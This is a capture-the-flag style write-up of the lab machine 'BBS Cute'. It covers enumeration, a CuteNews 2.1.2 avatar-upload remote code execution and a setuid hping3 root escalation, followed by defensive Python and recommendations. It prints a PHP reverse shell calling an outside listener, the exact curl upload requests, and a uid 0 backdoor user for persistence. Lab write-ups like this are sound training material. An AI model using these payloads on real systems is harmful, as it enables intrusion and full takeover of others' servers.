BBS Cute

A 5-point machine on Proving Grounds Play.

Executive Summary

The target machine was running an out-of-date version of a web forum package that contained a local file inclusion vulnerability allowing arbitrary PHP code execution via an authenticated file upload mechanism. Further, the machine included a network test tool configured in a way that allowed low-privileged users to run arbitrary commands as root.

Methodology

I enumerated the machine using nmap and gobuster, located the vulnerable web app and potential exploits with exploitdb, exploited the vulnerable web app using the provided proof-of-concept, then enumerated the user environment with built-in tools, located the network test tool, and finally exploited it via the method described on GTFOBins.

Information Gathering

I used nmap -p- --open 192.168.188.128 to discover open ports and found five: 22, 80, 88, 110, and 995. I then fingerprinted each port to determine the software responding on it:

22/tcp  open  ssh
80/tcp  open  http
88/tcp  open  kerberos-sec
110/tcp open  pop3
995/tcp open  pop3s

After determining that the web server on port 80 was the best starting point, I first visited the site in Firefox and found it serving the default web-server content from a Debian installation. Since this is static content without likely vulnerabilities, I used gobuster to check whether any other content was present on the web server.

Gobuster indicated that there were several files of interest:

/.htaccess            (Status: 403) [Size: 280]
/.hta                 (Status: 403) [Size: 280]
/.htpasswd            (Status: 403) [Size: 280]
/core                 (Status: 301) [Size: 317] [--> http://192.168.188.128/core/]
/docs                 (Status: 301) [Size: 317] [--> http://192.168.188.128/docs/]
/favicon.ico          (Status: 200) [Size: 1150]
/index.html           (Status: 200) [Size: 10701]
/index.php            (Status: 200) [Size: 6175]
/libs                 (Status: 301) [Size: 317] [--> http://192.168.188.128/libs/]
/manual               (Status: 301) [Size: 319] [--> http://192.168.188.128/manual/]
/server-status        (Status: 403) [Size: 280]
/skins                (Status: 301) [Size: 318] [--> http://192.168.188.128/skins/]
/uploads              (Status: 301) [Size: 320] [--> http://192.168.188.128/uploads/]

After visiting each in turn, I determined that a web forum package, CuteNews, was installed. The version number 2.1.2 was reported by the software when requesting index.php.

I returned to the overall list of open ports and attempted to identify any other services that might be vulnerable. Finding nothing more relevant, I continued to focus on the web server and forum application.

Vulnerability Assessment

I located several vulnerabilities that apply to this version of cutenews.

CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)   | php/remote/46698.rb
CuteNews 2.1.2 - Arbitrary File Deletion                       | php/webapps/48447.txt
CuteNews 2.1.2 - Authenticated Arbitrary File Upload           | php/webapps/48458.txt
CuteNews 2.1.2 - Remote Code Execution                         | php/webapps/48800.py

Starting with the first listed vulnerability, I found that remote code execution can be attained through an authenticated file upload that leads to a local file inclusion.

Of note, one of the other vulnerabilities refers to the same issue, but I focused on the first one. This was a mistake: the Metasploit module was cumbersome to work from because I wanted to avoid Metasploit, and I ended up spending more time than needed converting its logic into curl commands.

Exploitation

I placed a payload file that starts with the GIF header so that it passes the image-type check. (The file is the bytes GIF\r\n followed by the PHP reverse shell.)

GIF

<?php $s = fsockopen('192.168.45.158', 4444); proc_open('/bin/bash', [0=>$s,1=>$s,2=>$s], $p);?>

Then, using the session cookie from a new user account I had registered through the web interface, along with the signature tokens included in the dashboard page, I issued the following upload request, followed by a request for the uploaded file:

curl -X POST 'http://192.168.188.128/index.php' -F "mod=main" -F "opt=personal" -F "__signature_key=51802df4cfedd641a779c2cfad024046-bob" -F "__signature_dsi=133761aa31ec3234a8e935320f52ea25" -F "editpassword=" -F "confirmpassword=" -F "editnickname=bob" -F "avatar_file=@./innocent.php;type=image/png" -F "more[site]=" -F "more[about]=" --compressed -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://192.168.188.128/index.php?mod=main' -H 'Cookie: CUTENEWS_SESSION=710nhebjac6vtep3uph7gc6e8l' -H 'Upgrade-Insecure-Requests: 1' -H 'Priority: u=0, i'

curl 'http://192.168.188.128/uploads/avatar_bob_innocent.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0' -H 'Accept: image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://192.168.188.128/' -H 'Priority: u=5, i'

This sequence uploads, as the avatar of the user I created, a file that is a valid PHP script but also passes the application's tests for a "valid" image file. Requesting that file then causes the server to interpret it as PHP, which initiates the reverse-shell connection to the listener I had waiting:

sudo nc -lvnp 4444
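The GIF-prefix trick above works because the upload check only inspects the first bytes of the file. The following Python, an added example that is neither CuteNews code nor the author's, puts such a shallow magic-bytes check beside the stricter validation a defender would want: an extension whitelist, the full signature for that extension, a GIF framing check, a scan for PHP open tags, and a server-generated filename instead of the client's. The sample uploads (REAL_GIF, POLYGLOT, SPLICED) are constructed for this example, and the function and constant names are my own.

```python
import re
import secrets
import struct

# Allowed avatar extensions and the full signature each must start with.
ALLOWED = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}
# PHP open tag and HTML script tag; a heuristic, see the note below.
SCRIPT_MARKERS = re.compile(rb"<\?php|<script", re.IGNORECASE)

# Constructed samples (not files from the original write-up).
# A structurally complete 1x1 GIF: header, screen descriptor, 2-entry colour
# table, image descriptor, minimal LZW data, trailer.
REAL_GIF = (
    b"GIF89a"
    + struct.pack("<HHBBB", 1, 1, 0x80, 0, 0)
    + b"\x00\x00\x00\xff\xff\xff"
    + b"\x2c" + struct.pack("<HHHHB", 0, 0, 1, 1, 0)
    + b"\x02\x02\x44\x01\x00"
    + b"\x3b"
)
# Same shape as the write-up's payload: GIF magic, newline, then PHP.
POLYGLOT = b"GIF\r\n<?php echo 'not really an image'; ?>"
# A better-disguised variant: a real GIF with PHP spliced in before the trailer.
SPLICED = REAL_GIF[:-1] + b"<?php echo 'hidden'; ?>" + b"\x3b"


def shallow_check(data: bytes) -> bool:
    """The kind of check the polyglot defeats: only the first bytes are read."""
    return data[:3] == b"GIF"


def _gif_structure_ok(data: bytes) -> bool:
    """Cheap framing check: header long enough, non-zero size, GIF trailer."""
    if len(data) < 14 or data[-1:] != b"\x3b":
        return False
    width, height = struct.unpack_from("<HH", data, 6)
    return width > 0 and height > 0


def strict_check(filename: str, data: bytes) -> tuple:
    """Return (accepted, reason). Each rule on its own blocks one upload trick."""
    parts = filename.lower().rsplit("/", 1)[-1].split(".")
    if len(parts) != 2:
        return False, "filename must be name.ext with exactly one extension"
    ext = parts[1]
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed"
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, "magic bytes do not match extension"
    if ext == "gif" and not _gif_structure_ok(data):
        return False, "GIF header/trailer malformed"
    if SCRIPT_MARKERS.search(data):
        return False, "script marker found inside image data"
    return True, "ok"


def stored_name(user: str, ext: str) -> str:
    """Never reuse the client's filename; the extension comes from validation."""
    return f"avatar_{user}_{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    for fname, blob in (("innocent.php", POLYGLOT),
                        ("innocent.gif", SPLICED),
                        ("avatar.gif", REAL_GIF)):
        print(fname, "shallow:", shallow_check(blob),
              "strict:", strict_check(fname, blob))
```

The strict check rejects innocent.php on its extension alone, a correctly named polyglot on its truncated signature, and the spliced variant on its embedded open tag. The tag scan is only a heuristic (it can false-positive on large binary images), so the control that actually closes this class of bug is not letting the web server execute anything under /uploads/ (no PHP handler for that directory, or storing avatars outside the web root), ideally combined with re-encoding avatars on the server.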

Post Exploitation

After gaining initial access I poked around looking for typical misconfigurations. One that came to the surface quickly was a binary with setuid set:

find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/mount
/usr/sbin/hping3
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

Specifically, I am looking at hping3 here, which GTFOBins lists as abusable when it is installed setuid, as it is in this case.
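As an added check (example code, not part of the original write-up), the following Python reproduces the setuid sweep above and diffs the result against a baseline of expected setuid binaries, so that an unexpected entry such as /usr/sbin/hping3 stands out during a periodic audit. The baseline EXPECTED_SETUID is constructed for this example as an approximation of a stock Debian install, not an official list, and the function names are my own.

```python
import os
import stat
import tempfile

# Constructed baseline of setuid binaries expected on a stock Debian install
# (an approximation for this example, not an official list).
EXPECTED_SETUID = {
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/su",
    "/usr/bin/pkexec", "/usr/bin/sudo", "/usr/bin/umount", "/usr/bin/newgrp",
    "/usr/bin/fusermount", "/usr/bin/passwd", "/usr/bin/mount",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device",
}

# The list the sweep produced on the target, copied from the report above.
REPORT_SETUID = sorted(EXPECTED_SETUID | {"/usr/sbin/hping3"})


def find_setuid(root="/"):
    """Regular files under root with the setuid bit set: the Python equivalent
    of `find / -perm -u=s -type f`. Symlinks are not followed and unreadable
    entries are skipped, mirroring the `2>/dev/null` in the report."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def unexpected_setuid(found, baseline=EXPECTED_SETUID):
    """Entries present on the host but absent from the baseline: each one
    needs a written justification or the bit removed (chmod u-s)."""
    return sorted(set(found) - set(baseline))


def self_test_dir():
    """Build a scratch directory with one setuid and one plain file and report
    what find_setuid sees there, plus whether the bit could actually be set."""
    d = tempfile.mkdtemp(prefix="suidaudit-")
    plain, suid = os.path.join(d, "plain"), os.path.join(d, "suid")
    for path, mode in ((plain, 0o755), (suid, 0o4755)):
        with open(path, "wb"):
            pass
        os.chmod(path, mode)
    bit_set = bool(os.stat(suid).st_mode & stat.S_ISUID)
    return find_setuid(d), suid, plain, bit_set


if __name__ == "__main__":
    for path in unexpected_setuid(REPORT_SETUID):
        print("unexpected setuid binary:", path)
    # Live audit of the current host (slow on large filesystems):
    # for path in unexpected_setuid(find_setuid("/")): print(path)
```

Run against the report's list this prints only /usr/sbin/hping3, which is the entry that needs a decision: remove the tool, drop the bit, or document why it must stay. Note that a sudo rule scoped to hping3 still gives its authorized users the interactive capability the report used, so such a rule should name only the operators who genuinely need the tool.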

The tool allows its elevated privileges to be used for arbitrary commands, so I can create a root shell immediately by starting it and running /bin/sh -p. This returns a root shell, with which I am able to create an additional uid 0 user with a known password.

At this point I can log in over the SSH service as the created uid 0 user with the known password, providing some persistence and a fully featured shell with root access.

Risk Analysis

This attack was trivial and presents a critical risk: the machine can be completely controlled by any unauthenticated party able to send packets to it on port 80 and receive packets back from it on any port.

The attack required the creation of a valid user account, but this is permitted without authentication or verification in the current configuration.

Recommendations

I recommend removing the network test tool hping3 or, if that is not feasible, moving it to a secure location inaccessible to ordinary users. Alternatively, remove the setuid bit from it and instead configure sudo so that authorized users can run that specific command only.

I recommend upgrading the forum software to a non-vulnerable version and requiring verification and approval of new users instead of open registration. Additionally, it appeared that the www user may have had write access to folders that were not necessary for the function of that account; this should be reviewed.